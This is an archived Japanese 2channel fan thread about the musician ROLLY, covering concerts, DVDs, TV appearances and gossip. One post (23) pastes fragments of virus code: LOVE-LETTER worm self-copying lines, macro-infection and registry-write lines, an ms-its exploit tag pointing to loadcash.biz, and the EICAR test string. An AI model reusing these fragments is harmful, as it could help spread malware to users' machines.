2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★ROLLY Part2★

1 :NO MUSIC NO NAME:2006/10/27(金) 21:58:32 ID:UkmO72wy
前スレ
http://music5.2ch.net/test/read.cgi/musicjm/1148356157/

2 :NO MUSIC NO NAME:2006/10/27(金) 22:02:31 ID:UkmO72wy
<オフィシャルサイト>  
■ROLLY http://www.rollynet.com/  
■shima-chang http://homepage3.nifty.com/shima-chang/  
■小畑ポンプ http://sweety.jp/pump/  
■ドクター田中  
■小川文明 http://www.bunmei.com/

<関連スレ> すかんちPart14
http://music6.2ch.net/test/read.cgi/legend/1155911688/


3 :あぼーん:あぼーん
あぼーん

4 :NO MUSIC NO NAME:2006/10/28(土) 11:08:05 ID:ro19jZxZ
終わったと思ったら
復活したー

5 :NO MUSIC NO NAME:2006/10/29(日) 05:01:44 ID:S3qXRBS+
もう立てなくていいよ…

6 :NO MUSIC NO NAME:2006/10/30(月) 01:46:41 ID:/msA36XZ
みんな空気読んであえてたてなかったのにな
やめといたほうがよかったのに。

7 :NO MUSIC NO NAME:2006/10/30(月) 21:01:11 ID:L9p49TR2
VISUAL COMPLETE Vol.1 が今日届いたのですが、
リーフレットとかなくて、DVDしか入っていないのでしょうか?
Vol.2には、入っていたから心配になって・・・。

8 :NO MUSIC NO NAME:2006/10/30(月) 22:29:51 ID:4Ey5RmlI
>>7
みんな入ってないから安心しろw。

9 :NO MUSIC NO NAME:2006/10/30(月) 22:53:20 ID:lYLT2/E0
>>1さん乙♪

10 :NO MUSIC NO NAME:2006/10/30(月) 23:03:53 ID:L9p49TR2
>>8
入ってなくて正解なんですね。ありがとうございました。

11 :NO MUSIC NO NAME:2006/11/01(水) 18:19:55 ID:thwGVmVJ
韓国映画の試写会ゲストに出たらしいけどなんでやろ?

12 :NO MUSIC NO NAME:2006/11/03(金) 13:49:39 ID:qaLnQDYN
SOS'99の頃のプロモのROLLY見てたら、北村一輝に見えたw。

13 :NO MUSIC NO NAME:2006/11/03(金) 21:00:03 ID:cgqJrNEP
今でもスッピンの顔なんかは特に北村一輝に似てるよ。
あそこまで濃いくないけど。

14 :NO MUSIC NO NAME:2006/11/04(土) 19:45:14 ID:XXMiVoVC
今日は生でいじめ番組司会か…

15 :NO MUSIC NO NAME:2006/11/04(土) 21:37:46 ID:iixXmvIG
知らなかった.....。

16 :NO MUSIC NO NAME:2006/11/05(日) 10:32:00 ID:k1JFLTDq
ROLLY!
サンジャポ感動したよ!

全国のいじめらてる子にROLLYのメッセージは、伝わったんじゃないかな。

17 :NO MUSIC NO NAME:2006/11/05(日) 11:16:31 ID:9Yy0hpK/
あの写真がデンキブタナマズって言われてた頃?
ROLLYがギターと出会えてホントに良かったねぇ。
いじめられていなかったら、自分達もROLLYに
出会えていなかったかもしれない。

18 :NO MUSIC NO NAME:2006/11/05(日) 13:27:09 ID:oWrYMhZy
過去に何があろうができる奴はできる。何度チャンスあってもできない奴はできない
きっかけはいつになろうとなんだかんだローリーはギターと出会う運命だったんだよ

19 :NO MUSIC NO NAME:2006/11/07(火) 00:06:05 ID:dGPoclCj
また卍やるんだね!

20 :NO MUSIC NO NAME:2006/11/07(火) 16:44:18 ID:59OQSvhD
って言うか、卍に決定したんだね。
ROLLYはいやがってたけど。w

21 :NO MUSIC NO NAME:2006/11/08(水) 00:06:32 ID:YywvVS6g
サトリ...か。

22 :NO MUSIC NO NAME:2006/11/08(水) 04:35:36 ID:QtW1VEhb
サンジャポに中学生頃の写真が写ってたけど
ローリーって整形なの?

23 :NO MUSIC NO NAME:2006/11/08(水) 05:42:04 ID:k7b2/fH4
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

24 :NO MUSIC NO NAME:2006/11/10(金) 22:10:17 ID:Oc7LOOrb
もうずっと人大杉

携帯 でのアクセスについて

■とりあえずスレッドを読むには■

っていきなりなったんだけど・・・
すかんちPart14 が見れなくなった。
どうして?
誰か教えてください。

25 :NO MUSIC NO NAME:2006/11/11(土) 00:58:00 ID:JnNG+lvn
オフィシャルに今月の装苑に写真が掲載されていると書いてあったんだが、なくない?
見落としてるだけなのかな・・・

26 :@大阪:2006/11/11(土) 10:18:12 ID:4dkx2mZu
テレビをつけたらROLLYが「あさぱら」に出ててびっくり!!
眼帯してるのはファッション?

27 :NO MUSIC NO NAME:2006/11/11(土) 15:19:30 ID:aOkMnyWj
終わったか...。

28 :NO MUSIC NO NAME:2006/11/12(日) 00:07:47 ID:8CR8IFMc
>>24
PC買って、専ブラ使えば解決!


29 :NO MUSIC NO NAME:2006/11/13(月) 22:58:31 ID:0bXmR4IJ
アドバイスサンキュー!!

30 :NO MUSIC NO NAME:2006/11/14(火) 08:37:39 ID:vtonB9cL
公式やばいね・・・
私はすかんちライブ初めてなんだけどなんかがっかり

31 :NO MUSIC NO NAME:2006/11/15(水) 18:46:25 ID:S3OuAx81
>>26
自分も気になった。ファッションにせよほんとに眼病にせよ似合ってた、かっこよかった。

32 :NO MUSIC NO NAME:2006/11/15(水) 19:49:02 ID:p7ZDS0kr
前日眼科に行ったら、「眼球が傷だらけ」と言われたらしい。

33 :NO MUSIC NO NAME:2006/11/15(水) 22:17:23 ID:9QsKqqVZ
>>30
そういうキミには、
2006年12月14日 Club Lizard YOKOHAMAの卍を
観に行くことをお勧めするよ。



34 :NO MUSIC NO NAME:2006/11/17(金) 21:33:15 ID:cZjbsOyl
すっぴん顔を見てみたい。

35 :NO MUSIC NO NAME:2006/11/18(土) 00:22:28 ID:GxTLzUx9
>>34 先月発売のDVDみれ プロモ集のやつ。

36 :NO MUSIC NO NAME:2006/11/18(土) 10:56:53 ID:KajE/fcO
ROLLY日記書いてくれないね。
目目痛いからだろうか?

37 :NO MUSIC NO NAME:2006/11/18(土) 11:18:54 ID:KajE/fcO
連続スマソ。
>>24
理由はわからないけど...PCサイトビューアーじゃなくて2ちゃんの携帯サイトからならどうでしょうね。


38 :NO MUSIC NO NAME:2006/11/18(土) 12:12:55 ID:u1WYrfGa
>>36
掲示板見て辟易してるんじゃない?

39 :NO MUSIC NO NAME:2006/11/19(日) 17:49:00 ID:MHYRGIot
>>38
やっぱりそうなのかなぁ。
でも、なんとなく解決したっぽいから、ちょっと安心。
世の中には言わなくていい事もあるって"うそつき天国"もいっている。


40 :寺西 直樹:2006/11/19(日) 17:52:49 ID:SnG7Pfoe
論破ミサイル。 いつも応援ありがとう。

41 :NO MUSIC NO NAME:2006/11/21(火) 01:28:08 ID:9Boias4J
ロックフジヤマでアルバム出すんだってよ!!

42 :NO MUSIC NO NAME:2006/11/22(水) 11:38:07 ID:jcXWXDDH
いいね。
やしろあきとか参加するのかな。

43 :NO MUSIC NO NAME:2006/11/22(水) 12:46:05 ID:QpGUswg1
>>42
面白い(笑)

44 :NO MUSIC NO NAME:2006/11/22(水) 14:54:52 ID:bbHD9fzE
噂によるとローリーがボーカルとってる曲もあるんだってよ

45 :NO MUSIC NO NAME:2006/11/22(水) 19:23:31 ID:HxzfuW6C
>>44
まじっすか?
めちゃ嬉しいー!

46 :NO MUSIC NO NAME:2006/11/25(土) 23:42:49 ID:7ifEcrXo
そうだね。
ギターもいいけどROLLYが歌わないのはもったいないもんね。

47 :NO MUSIC NO NAME:2006/11/26(日) 00:11:31 ID:AiyGjIfG
誰か、25日の郡山アコギセミナー行った人いませんか?
ちゃんと元気な姿でセミナーやったの?
最近mixiにもアクセスしてないみたいだから、なんかおかしいんだ。

48 :NO MUSIC NO NAME:2006/11/26(日) 11:37:54 ID:229kGw0u
レコーディングが忙しいんでしょ

49 :NO MUSIC NO NAME:2006/11/26(日) 21:50:11 ID:HhRvI/67
最近好きになってCD集め中
1人でコンサート行っても大丈夫な雰囲気ですか?

50 :NO MUSIC NO NAME:2006/11/26(日) 22:23:20 ID:ZZRLAf13
>>49
別に問題ないよ。
俺もひとりで行ってます。

51 :NO MUSIC NO NAME:2006/11/26(日) 23:07:18 ID:ceONX+GX
>>49
全然だいじょうぶ。
ROLLYのファンが増えるの嬉しい(^∪^*)
いちばん近いライブだと卍だね。あとはアコギと来年のすかんち。

52 :NO MUSIC NO NAME:2006/11/27(月) 01:18:20 ID:zHyogttK ?2BP(0)
一人で来てる人結構多いよ。
私もその一人だけど、いつも見る顔馴染みの人とか
いつの間にか友達になってたりする。
ROLLYファンはいい人多いよ。

53 :NO MUSIC NO NAME:2006/11/27(月) 08:55:01 ID:jLNgGi8l
大晦日にNHKでみんなのうた一挙放送するらしいよ。
FMラジオと衛星第2で。
「変身」もかかると良いね


54 :NO MUSIC NO NAME:2006/11/27(月) 12:25:05 ID:A1ACRaLR
ROLLY、郡山遅刻したの?
なんで?
海外にバカンスに行ってたの?

55 :49:2006/11/27(月) 19:26:45 ID:pD5t2oTJ
>50
>51
>52
ありがとうです。来年のすかんち行ってみます。

56 :NO MUSIC NO NAME:2006/11/27(月) 22:44:23 ID:0s4NWU+t
日記更新してたね。
>>48←当たりっぽい。
>>54 何何??
もし少し詳しく教えてくれる方ー いらっしゃる?

57 :NO MUSIC NO NAME:2006/11/28(火) 01:45:09 ID:i2O7yRv1
今日のFUJIYAMAでエレキバン貼ってた・・・

58 :NO MUSIC NO NAME:2006/11/28(火) 12:27:18 ID:NEsMHVjd
郡山のアコギ、ローリーが海外から帰ってくるから
3時間遅れってMに書いてあったよ。
でも、プライベートで海外行って、イベントに遅刻!?ってこと?
誰か、郡山のアコギ行った人いないの?


59 :NO MUSIC NO NAME:2006/11/28(火) 12:31:27 ID:D40Oq588
そもそもアコギのイベントって何するの?

60 :NO MUSIC NO NAME:2006/11/28(火) 13:02:14 ID:DMK7R5Oj ?2BP(0)
>>58
なんで「プライベート」だと思うの?Mにはそんな事一言も書いてなかったよ。

>>59
YAMAHAのアコギがいかに素晴らしいかを延々語り、それを聞いている間に
いつの間にか部屋の出口のカギが閉められます。
ギターを買うまで帰して貰えません。
私も1本500万円のアコギを買って、やっと帰して貰った。






という想像をしてみた。

61 :NO MUSIC NO NAME:2006/11/28(火) 16:03:17 ID:wIGKWt5V
Mってなに?

62 :NO MUSIC NO NAME:2006/11/28(火) 22:08:30 ID:If4ZTjll
マゾ

63 :NO MUSIC NO NAME:2006/11/28(火) 23:53:22 ID:wlSXuqVa
>>60
>>62
んなアホな。

64 :NO MUSIC NO NAME:2006/11/29(水) 01:25:38 ID:N2sFVXz5
Mはmixi(ミクシィ)の事。

65 :NO MUSIC NO NAME:2006/11/29(水) 17:37:08 ID:JAG4l5J5
たぶん>61以外は分っていたと思うw

66 :NO MUSIC NO NAME:2006/11/29(水) 18:31:14 ID:34ZEoD/E
>>65
いや、自分も知らなかった。おはずかしい(〃∇〃)
イベントの時間が遅くなっても、きっとそれ以上詳しい説明はお客さんにはしなさそうな気がするなぁ。
お仕事で海外でも、どちらにしろ予定いっぱいなんだね。

67 :NO MUSIC NO NAME:2006/11/29(水) 22:03:45 ID:rn5YHZxT
ローリー全盛期再び
みたいな

68 :NO MUSIC NO NAME:2006/11/30(木) 07:32:41 ID:IB25EH9q
雑誌情報教えてくれる神はいませんか…
携帯は不便すぎる

69 :NO MUSIC NO NAME:2006/11/30(木) 17:48:12 ID:du45HUy5
>>68

http://fileseek.net//proxy.html

これでHPアクセスしなよ☆

70 :NO MUSIC NO NAME:2006/11/30(木) 18:30:35 ID:ZkAakweJ
>>67
お、なんかいぃ響きだねぇ。
ご本人が喜びそう。
>>58
遅ればせながら、教えてくれてありがとです。気になったから少しでもわかって良かった。

71 :NO MUSIC NO NAME:2006/12/04(月) 02:29:52 ID:HiFUQ5cs
>>58 >>60 はM日記なんで読めるの?

72 :NO MUSIC NO NAME:2006/12/04(月) 07:00:02 ID:tuioBMR8 ?2BP(0)
>>71
Mの会員だからだよ。

73 :NO MUSIC NO NAME:2006/12/04(月) 08:17:34 ID:YZTZ7tmt
Mでの名前は!?探しても見つからない

74 :NO MUSIC NO NAME:2006/12/04(月) 20:02:42 ID:yL1gDCeM
アコギセミナーって何分くらい???

75 :NO MUSIC NO NAME:2006/12/04(月) 20:34:53 ID:tuioBMR8 ?2BP(0)
>>74
1時間だお。

76 :NO MUSIC NO NAME:2006/12/04(月) 20:57:24 ID:5H5/YKkO
探してもみつからない

自分のめがね

77 :74:2006/12/04(月) 21:44:39 ID:yL1gDCeM
>>75
thanx

78 :NO MUSIC NO NAME:2006/12/04(月) 22:26:04 ID:KIyP/+Po
>>76
歌丸です。(笑)もう司会だけど。
公式読むとセミナー楽しそうだよねぇ。

79 :NO MUSIC NO NAME:2006/12/05(火) 03:09:45 ID:Q8TtICUd
どうか探さないでください。

80 :NO MUSIC NO NAME:2006/12/06(水) 23:02:54 ID:0LElVCGl
別に探してなんかいません

81 :NO MUSIC NO NAME:2006/12/07(木) 22:48:32 ID:8Ts3CKhs
東京のアコギのは、いこうとしたらまだ間に合うの?

82 :NO MUSIC NO NAME:2006/12/08(金) 21:24:24 ID:uyvRcF3k
まだ110人くらいしか申し込んでないからきっと大丈夫。

83 :NO MUSIC NO NAME:2006/12/08(金) 21:50:47 ID:FKpcZxg/
ROLLYの演奏がこれでもかって聞けるのかな?

84 :NO MUSIC NO NAME:2006/12/08(金) 23:57:11 ID:mh97F/bn
>>82
そうなんですか!?問い合わせしてみます。ありがとうございます。

85 :NO MUSIC NO NAME:2006/12/09(土) 16:09:10 ID:iiIxtFqe
ダイアリー更新キタ━━!!
たべたいにゃあって・・・かわええw

86 :NO MUSIC NO NAME:2006/12/11(月) 08:38:31 ID:SPFk51gm
>>85 うん、かわいぃ。黒いラーメン食べれたかなぁ。
で、今日は卍のリハ。
当日は雨っぽいね。

87 :NO MUSIC NO NAME:2006/12/13(水) 19:04:04 ID:uqIPK4EK
ローリーって自伝とかだしてないんですか?
出してたんなら教えてください頼んます

88 :NO MUSIC NO NAME:2006/12/14(木) 16:18:30 ID:H/+Sj8J5
spa!の電気ブタナマズ時代、カラー写真で見ると更に凄いですね
電気とブタはわかるけど、ナマズの由来は?
ナマズみたいな口ひげでも生えてたんですかね?



89 :NO MUSIC NO NAME:2006/12/15(金) 23:05:24 ID:evlf35bT
昨日横浜で卍のライブを見てきた。ROLLYの日記にあった通りすごく少人数だったけど、メンバーと近くて男前ないいライブだった。

90 :NO MUSIC NO NAME:2006/12/16(土) 00:21:18 ID:ySQ8WyQu
卍、楽しかったねぇ。
演奏してる本人たちが楽しそうなのがなによりだわぁ。

91 :NO MUSIC NO NAME:2006/12/16(土) 00:22:43 ID:F2NvsErR
最前にノリ悪い人いたけど楽しかったね〜

92 :NO MUSIC NO NAME:2006/12/16(土) 00:49:41 ID:Ci0TGCzX
>>90
>>91
うん、楽しかった。
またあーゆーのがいいな。

93 :NO MUSIC NO NAME:2006/12/16(土) 02:09:37 ID:KREKhNTP
>>91
一般人のことをとやかく言うのはやめようよ。

94 :NO MUSIC NO NAME:2006/12/16(土) 18:44:58 ID:DKXBqHpM
どんな曲やったんですか?
なんかカバーはあった??

95 :NO MUSIC NO NAME:2006/12/17(日) 08:24:47 ID:9BhEyK0K
>>87
恋の謎謎変人図鑑と不思議の国のローリー。
密林みたらあるかもね。

96 :NO MUSIC NO NAME:2006/12/18(月) 00:15:58 ID:qDWnBbAa
>94
必殺のハードラブ
Steppin Stone
ロデオ
政治家(クリーム)
JUST A JIGORO
マンゴージュース
パイプライン(ベンチャーズ)
WILD FLOWER
HE IS SO FINE

97 :NO MUSIC NO NAME:2006/12/18(月) 11:05:34 ID:wRUM3ogi
ありがとうございます!
ローリーのクリーム聴きたかった。。。
サトケン氏のベンチャーズ凄かったんだろうなあ。。。

マルコシ曲はやっぱりやらんのね。
「赤道直下のブギウギ」あたりだったら違和感ない、つーか
ローリーにもピッタリだと思うんだけどなあ。
サトケン氏作曲だし。  聴きたいなあ。

98 :NO MUSIC NO NAME:2006/12/19(火) 23:31:41 ID:YLC2EbY7
遅いですが...日曜日、アコギセミナーへ行ってきた。ギターの事ナニも分からなくても全然大丈夫、楽しいイベントだったよ。
ヤマハのギターの話になる時、ROLLYもココとばかりにニヤリとなさるW鍵はかけられなかったみたいだけど、思い出して笑ってしまったW
無事に帰ってきたのでこれから近くの方は安心してどうぞ。
お小遣いは多めにあると、もれなくサインがついてくる。


99 :NO MUSIC NO NAME:2006/12/20(水) 15:45:53 ID:8mEYxhWv
たかじん訴えられたんだね
ローリーもいじめられて涙目になってたもんな〜

100 :NO MUSIC NO NAME:2006/12/20(水) 18:03:45 ID:QSFf8mqW
>>99
ROLLYの件詳しく!

101 :NO MUSIC NO NAME:2006/12/22(金) 00:07:41 ID:hSWg1dhj
TOMMYについて語るROLLY@e+
ttp://blog.eplus.co.jp/mv_theatrix/0612_035

102 :NO MUSIC NO NAME:2006/12/28(木) 08:29:05 ID:JAYhdxEl
昨日もTOMMYの楽日チケット取りしたんだけど、ダメだった。
全敗だーo(T□T)o
楽日みんな行きたいのね。

103 :NO MUSIC NO NAME:2006/12/29(金) 20:37:36 ID:hROpD29a
TOMMYの大阪公演って公式に載ってる発売日以外に先行とかないのかな。
どこで取るべきか、どの日に行くか・・悩む。
楽日は大阪でも取るのも難しいぐらいの競争率なんだろうか。

104 :NO MUSIC NO NAME:2006/12/31(日) 20:41:33 ID:HnSmmolR
今、日テレでROLLYがいじめられた時のことを語ってた。

105 :NO MUSIC NO NAME:2006/12/31(日) 21:09:35 ID:5Syf0Rhm
出てたねROLLY

106 :NO MUSIC NO NAME:2007/01/01(月) 12:09:29 ID:D/+TWxSR
ROLLY明けましておめでとう!
今年も良い年になりますように☆

107 :NO MUSIC NO NAME:2007/01/01(月) 23:58:51 ID:6nkj0szT
ROLLY働きっぷり見ました。今年も頑張ってね。

108 :NO MUSIC NO NAME:2007/01/03(水) 07:44:35 ID:tGHaC70l
あんなの出ちゃうんだ ww

109 :NO MUSIC NO NAME:2007/01/03(水) 20:38:09 ID:bY7nHe9s
ファンの方のブログで、この前横浜の卍ライブに「例によって華やかなお供の方を伴ってご入場」
て書いてあるんですが、どんな人?ROLLYっていつもそんなお供を連れて入るの?
すみません気になって仕方ないので、どなたか教えてください!

110 :NO MUSIC NO NAME:2007/01/03(水) 22:16:37 ID:12Ynrxlr
そんなに気になるならそのブログの主に聞いたらいいのに。

111 :NO MUSIC NO NAME:2007/01/03(水) 22:37:49 ID:rpHrX3PX
お供って、りんごとか?

112 :NO MUSIC NO NAME:2007/01/03(水) 23:49:58 ID:klQH4vAA
ぽんすけの時も同じ女の子を連れて来たらしいよ。

113 :NO MUSIC NO NAME:2007/01/04(木) 15:32:48 ID:3YivblW/
っていうか、彼女でしょ。
佐藤さんの物販のとこにいた人は、奥さん?
だとすれば、佐藤さんの奥さんはきれいな人だよね。

114 :NO MUSIC NO NAME:2007/01/04(木) 15:56:56 ID:MFvUSWuX
あの若い人は彼女ではありませんよ。いい加減な事を確認もせずに書いてはいけません。

115 :NO MUSIC NO NAME:2007/01/04(木) 19:28:54 ID:QlGxh4Qg
ROLLYの彼女は若くないんだな

116 :NO MUSIC NO NAME:2007/01/04(木) 19:51:42 ID:3YivblW/
114は確認したの?
なぜそう言い切れる?
それとも本人?

117 :NO MUSIC NO NAME:2007/01/04(木) 22:28:37 ID:3+Ibi4dv
>>111
おそなえ(お供え)じゃないの、おとも!! (笑)。
やっとわかったよぉ、りんご。ツッコミ遅くてスマソ(;^_^A
さては、墓参りちゃんと行ってるな?


118 :NO MUSIC NO NAME:2007/01/04(木) 22:45:30 ID:hF5bgYfA
>>111
>>117
今の今までROLLYのとりまきに「りんごちゃん」とか呼ばれてる人が
いるんだとばっかり思ってたーー(゚Д゚;) お供えワロスww


119 :NO MUSIC NO NAME:2007/01/05(金) 00:46:57 ID:boJDaF02
明けましておめでとー

120 :NO MUSIC NO NAME:2007/01/07(日) 02:41:35 ID:1eLpfn7w
今ローリーに彼女はいませんよ

121 :NO MUSIC NO NAME:2007/01/07(日) 21:16:05 ID:SIS5kDnO
>>120さんは114さん?
(^∪^*) 言われれば女の人の事かまってる暇は、ROLLYになかったっぽい気もする......。
またこんな話が出てる時はいるいない教えに来てね。
そういうの、うとくて全然知らん。
情報ツウだなぁ。

122 :NO MUSIC NO NAME:2007/01/08(月) 00:18:55 ID:F9Z9dGD6
でも、しょっちゅう一緒だよ?

123 :NO MUSIC NO NAME:2007/01/08(月) 11:28:51 ID:q92tvdPt
楽屋には知り合い程度の人達がしょっちゅう出入りしていますよ。
そういう人達が取り巻きのように行動するから勘違いされるのです。
楽屋は勘違いの渦ですよ(笑)

124 :NO MUSIC NO NAME:2007/01/08(月) 12:32:34 ID:F9Z9dGD6
ROLLY運転の車で2人で会場に乗り付けても?

125 :NO MUSIC NO NAME:2007/01/08(月) 15:58:43 ID:uLmsYkdT
ROLLY運転の車で2人で会場に乗り付けてもですよ(笑)
車さえも彼女の決定打ではない事を覚えておきましょう。
プライバシーはそんなにわかりやすく簡単には明かされません。



126 :NO MUSIC NO NAME:2007/01/08(月) 17:09:37 ID:4Vi7dEOW
単なるお友達でもROLLYの車に乗せてもらえるのってうらやましー
てか>>124はどんだけ観察しとんねんw

127 :NO MUSIC NO NAME:2007/01/08(月) 21:32:04 ID:crLFeYBE
大好きなんだね。
入り待ちしてくれてる方がROLLYも張り切れるだろうし、嬉しいと思う。


128 :NO MUSIC NO NAME:2007/01/08(月) 22:56:02 ID:QCu64sHl
彼女ではなく妻だったりして!

129 :NO MUSIC NO NAME:2007/01/09(火) 00:46:56 ID:dPPQKc/M
有り得なくもない。いっそその方がスッキリするかも。

130 :NO MUSIC NO NAME:2007/01/09(火) 01:06:32 ID:bwI0mm3H
妻説もありえるね〜
つうか良い歳した男に彼女くらいいた方がいいでしょ
応援してる側としても

131 :NO MUSIC NO NAME:2007/01/09(火) 02:19:32 ID:FqoOg4tl
ローリーには素敵な彼女がいてほしいな。
変な汚れみたいなのじゃなくてw
で、生涯独身で通してほしい。イメージ的に妻子持ちって似合わない。
言いたい放題でゴメソ

132 :NO MUSIC NO NAME:2007/01/09(火) 08:28:27 ID:LseT0a63
変な汚れ...(笑)。

133 :NO MUSIC NO NAME:2007/01/09(火) 10:25:56 ID:aYwWtx/j
じゃあ、どんな人が本当の彼女なの?
125は何か知っているんでしょう?

134 :NO MUSIC NO NAME:2007/01/09(火) 12:41:32 ID:sObpGR4s
彼女いるって言うとファン辞める人いるから
彼女いないって言ってるんじゃないの?
去年行くことが出来なかったファン旅行に行きたいって言ってるけど、
ローリー自身がそんなに楽しみにするほど楽しいの?
ファン旅行にも女連れてくるのかな?
ってかいつもマネージャーやアテンダントの他に誰か連れて来たことある?
今まで行った人教えて。

135 :NO MUSIC NO NAME:2007/01/09(火) 16:18:49 ID:1j+FAgQb
行った事ないけど、オナペッツが一緒だった事はあるよね。

136 :NO MUSIC NO NAME:2007/01/09(火) 20:10:00 ID:eC4uS1lh
114
あの若い人は彼女ではありませんよ
はなんか可愛そうな気がする

ぞっこんの自慢の可愛い彼女ですよ だったらみんな納得するし
すげーカッコいいと思う
そういうROLLYでいてほしい


137 :NO MUSIC NO NAME:2007/01/09(火) 23:44:11 ID:SdksXppn
かわいそうでも、話題が合わないから仕方ないのでしょう。
舞台芸術や芸能に対する理解が足りないのも原因でしょう。




138 :NO MUSIC NO NAME:2007/01/09(火) 23:54:29 ID:F79h2+iT
もしや本人!?

139 :NO MUSIC NO NAME:2007/01/10(水) 00:16:43 ID:3oVR0/Kq
114,123,125,137はキティですよ。

140 :NO MUSIC NO NAME:2007/01/10(水) 01:55:53 ID:BL5KmjQm
キティだって(笑)古い話題(笑)
真面目な業界の話が書かれているだけなのに、
139さんってなんか変(笑)
今はもう2007年。ファンも入れ替わっているのにね。



141 :NO MUSIC NO NAME:2007/01/10(水) 04:01:07 ID:/KOXGTbB
>>140
そんなに入れ替わってないよ。

142 :NO MUSIC NO NAME:2007/01/10(水) 05:15:33 ID:I3Ouf3eS
今日は名古屋ですかんちだっていうのにだ〜れも話題にしてないのはこれ如何に?
みんな! 音楽の話をしろよ〜〜w(知ってる?)

143 :NO MUSIC NO NAME:2007/01/10(水) 08:15:39 ID:QRBpcSfj
ライブが近くなると毎回こんな話になるね。
ところで、入り待ち・出待ちってどこでするの?

144 :NO MUSIC NO NAME:2007/01/10(水) 13:11:04 ID:/KOXGTbB
>>142
知ってるよー。
「君たち、ロックの話をしろよー。(泣きながら)」でしょ?

145 :NO MUSIC NO NAME:2007/01/10(水) 14:01:40 ID:tB9LC1oB
何ナニ??知らなーい。

146 :NO MUSIC NO NAME:2007/01/11(木) 03:17:21 ID:dIhOoGtm
by 橘高文彦



147 :NO MUSIC NO NAME:2007/01/11(木) 08:03:31 ID:W0REyPYz
打ち上げの酒の席で、マンガ道(だったかな?)とにかく漫画について熱く語り合うオーケンと内田
それを見ていた橘高文彦が、すっくと立ち上がり泣きながら2人に言った言葉。
それが・・・
「君たち、ロックの話をしろよー!」

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)